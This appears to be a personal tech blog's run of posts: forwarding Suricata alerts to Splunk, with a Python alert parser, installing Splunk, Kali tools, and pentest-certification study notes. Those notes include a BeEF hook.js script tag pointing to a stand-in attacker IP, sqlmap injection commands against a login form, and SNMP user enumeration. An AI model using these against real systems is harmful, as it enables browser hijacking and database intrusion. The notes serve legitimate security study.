Thursday, November 26, 2020

[Splunk][Suricata][Syslog] Enable Syslog on Suricata for Splunk (updated on 20201126)

[For Suricata side:]

# cd /etc/suricata/

# cp ./suricata.yaml ./suricata_with_syslog.yaml

# vi ./suricata_with_syslog.yaml

Make sure that the following lines exist:

  - syslog:
      enabled: yes
      identity: "suricata"
      facility: local5
      level: Info

:wq

# killall -9 suricata

# suricata -c /etc/suricata/suricata_with_syslog.yaml -i wlan0 -D

# vi /etc/rsyslog.conf

Add the following line to the file (here 192.168.0.253 is the Splunk server, 888 is the TCP port, and the double "@@" tells rsyslog to forward over TCP rather than UDP; note that "*.*" forwards every local syslog message, not only Suricata's):

*.*                             @@192.168.0.253:888

:wq

# /etc/init.d/rsyslog restart



[For Splunk side:]

1) Go to "Settings"->"Data Inputs"

2) Go to "TCP"->"Add new"

3) Enter "888"->Click "Next >"

4) "Select Source Type"->"Operating System"->"syslog"->"Review >"

5) "Submit >"

6) "Start Searching"
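Once events reach the Splunk TCP input they still carry the syslog PRI that encodes the facility and level configured above (local5 is facility 21, Info is severity 6, so PRI is 174). The parser below is an added example, not code from the original post or from Suricata or Splunk; it assumes rsyslog's default forward format and Suricata's fast-alert style syslog line, decodes the PRI, keeps only Suricata alerts, and counts high-priority alerts per source over constructed sample lines:

```python
import re
from collections import Counter

# PRI = facility * 8 + severity (RFC 3164): local5 (21) and Info (6) give 174.
LOCAL5 = 21

# rsyslog traditional forward format: <PRI>TIMESTAMP HOST TAG[PID]: MSG
SYSLOG_RE = re.compile(
    r"^<(?P<pri>\d{1,3})>(?P<ts>\w{3} [ \d]\d \d\d:\d\d:\d\d|\d{4}-\d\d-\d\dT\S+) "
    r"(?P<host>\S+) (?P<ident>[^\[: ]+)(?:\[(?P<pid>\d+)\])?: (?P<body>.*)$")
# Suricata fast-alert style (assumed): [gid:sid:rev] msg [Classification: c] [Priority: p] {PROTO} src:port -> dst:port
ALERT_RE = re.compile(
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] (?P<msg>.+?) "
    r"\[Classification: (?P<classification>[^\]]*)\] \[Priority: (?P<priority>\d+)\] "
    r"\{(?P<proto>\w+)\} (?P<src_ip>\S+):(?P<src_port>\d+) -> (?P<dst_ip>\S+):(?P<dst_port>\d+)$")
INT_FIELDS = ("gid", "sid", "rev", "priority", "src_port", "dst_port")

def parse_line(line):
    """Return a parsed Suricata alert dict, or None for any other syslog message."""
    m = SYSLOG_RE.match(line.strip())
    if not m:
        return None
    facility, severity = divmod(int(m["pri"]), 8)
    # '*.*' forwards every local message, so keep only the configured facility/identity.
    if facility != LOCAL5 or m["ident"] != "suricata":
        return None
    a = ALERT_RE.match(m["body"])
    if not a:
        return None
    rec = {k: int(v) if k in INT_FIELDS else v for k, v in a.groupdict().items()}
    rec.update(host=m["host"], facility=facility, severity=severity)
    return rec

def alerts_by_source(lines, max_priority=2):
    """Count alerts per source IP with priority 1..max_priority (1 = most severe)."""
    counts = Counter()
    for rec in filter(None, map(parse_line, lines)):
        if rec["priority"] <= max_priority:
            counts[rec["src_ip"]] += 1
    return counts

# Constructed sample lines, as the Splunk TCP input on port 888 would receive them.
SAMPLE = """\
<174>Nov 26 21:05:13 sensor suricata[2215]: [1:2100498:7] GPL ATTACK_RESPONSE id check returned root [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 203.0.113.7:80 -> 192.168.0.20:49152
<174>Nov 26 21:05:14 sensor suricata[2215]: [1:2001219:20] ET SCAN Potential SSH Scan [Classification: Attempted Information Leak] [Priority: 2] {TCP} 198.51.100.9:51000 -> 192.168.0.20:22
<174>Nov 26 21:05:15 sensor suricata[2215]: [1:2001219:20] ET SCAN Potential SSH Scan [Classification: Attempted Information Leak] [Priority: 2] {TCP} 198.51.100.9:51001 -> 192.168.0.21:22
<38>Nov 26 21:05:16 sensor sshd[900]: Accepted publickey for ops from 192.168.0.5 port 40012 ssh2
<174>Nov 26 21:05:17 sensor suricata[2215]: [1:2013028:6] ET POLICY curl User-Agent Outbound [Classification: Attempted Information Leak] [Priority: 3] {TCP} 192.168.0.20:53211 -> 203.0.113.7:80
"""
```

The sshd line (PRI 38, facility auth) is dropped by the facility check, which is the same filtering a Splunk search would need if "*.*" is kept in rsyslog.conf.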

Wednesday, November 25, 2020

[Splunk] Install and Launch Splunk at Ubuntu (updated on 20201125)

1) Download the Splunk tarball, splunk-8.1.0.1-24fd52428b5a-Linux-x86_64.tgz, into the folder /usr/local/sbin/.


2) Execute the following commands:

# cd /usr/local/sbin

# tar -zxvf ./splunk-8.1.0.1-24fd52428b5a-Linux-x86_64.tgz -C /opt


3) Launch Splunk by executing the command below:

# /opt/splunk/bin/splunk start


4) The first time you launch Splunk, press SPACE repeatedly to page to the end of the Terms of Service, then type y and press ENTER to accept and leave that page.


5) After that, create an administrator account by following the prompts.


6) To have Splunk start at boot, create a systemd unit file with the following commands:

# vi /etc/systemd/system/splunk.service

[Unit]
Description=Splunk server

[Service]
ExecStart=/opt/splunk/bin/splunk start
KillMode=process

[Install]
WantedBy=multi-user.target
Alias=splunk.service

:wq


7) Enable the unit at boot and start it:

# systemctl enable splunk.service

# systemctl start splunk.service


8) Finally, open http://IP:8000/ in a web browser, replacing IP with the server's address.

Wednesday, November 18, 2020

[Kali][Linux]Some useful tools when Kali Linux is your primary OS

To have Chinese input methods:

# apt-get install ibus ibus-pinyin


To have a better SSH client:

# apt-get install putty


To have a better file transfer tool (supports FTP and SFTP):

# apt-get install filezilla


To have the screenshot function:

# apt-get install gnome-screenshot


To monitor the status of each network adapter:

# apt-get install iptraf


To better monitor system resources:

# apt-get install htop


To have Chrome (the open-source Chromium build):

# apt-get install chromium


To download BitTorrent files:

# apt-get install transmission-gtk


To read/write Office files and PDF:

# apt-get install libreoffice


Friday, November 13, 2020

[eCPPT][BeEF][XSS]BeEF-XSS Installation Playbook updated on Nov 13, 2020

[Installation:]

# cd /usr/local/sbin

# git clone https://github.com/beefproject/beef

# cd beef

# ./install

After the installation is done, change the default password by:

# vi ./config.yaml

Modify 'passwd: "beef"' to your own password before saving the file and exiting.

# ./update-geoipdb


[Execution:]

# /usr/local/sbin/beef/beef

Then open "http://127.0.0.1:3000/ui/panel" to manage BeEF. Bear in mind that the hook URL is "http://YOUR_IP:3000/hook.js"; a page includes the hook with a snippet like the one shown below:

<script src="http://YOUR_IP:3000/hook.js"></script>

Thursday, November 12, 2020

[eCPPT][sqlmap]Enhance SQLMap's Success Rate

Using the parameters "--level" and "--risk" makes sqlmap launch more test cases, which raises the chance of a successful scan.


For instance, below is an ordinary scanning command:

# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --dbs


With the command above, the chance of getting any useful information may not be high. However, if you try:

# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --level 3 --risk 3 --dbs


You may get what you want directly.


To recap: the parameter "--level" (from 1 to 5) controls how many checks/payloads are performed, and the parameter "--risk" (from 1 to 3) controls the type of payloads used.

Monday, November 9, 2020

[eCPPT][SNMP]Get readable information through SNMP

Suppose you have already obtained the community string and would like to gather readable information about the target; the example below shows how:


# apt-get update && apt-get install snmpenum


# snmpenum --help

Usage: snmpenum <IP-address> <community> <configfile>


# ll /usr/share/snmpenum/
total 44
drwxr-xr-x   2 root root  4096 Nov  9 23:28 .
drwxr-xr-x 470 root root 20480 Nov  9 23:28 ..
-rw-r--r--   1 root root   554 Mar 26  2019 cisco.txt
-rw-r--r--   1 root root   347 Mar 26  2019 linux.txt
-rw-r--r--   1 root root  1103 Apr 28  2003 README.txt
-rwxr-xr-x   1 root root  3179 Mar 26  2019 snmpenum.pl
-rw-r--r--   1 root root   512 Mar 26  2019 windows.txt


# snmpenum 10.10.10.5 private windows.txt
...
----------------------------------------
USERS
----------------------------------------

Guest
admin
Administrator
...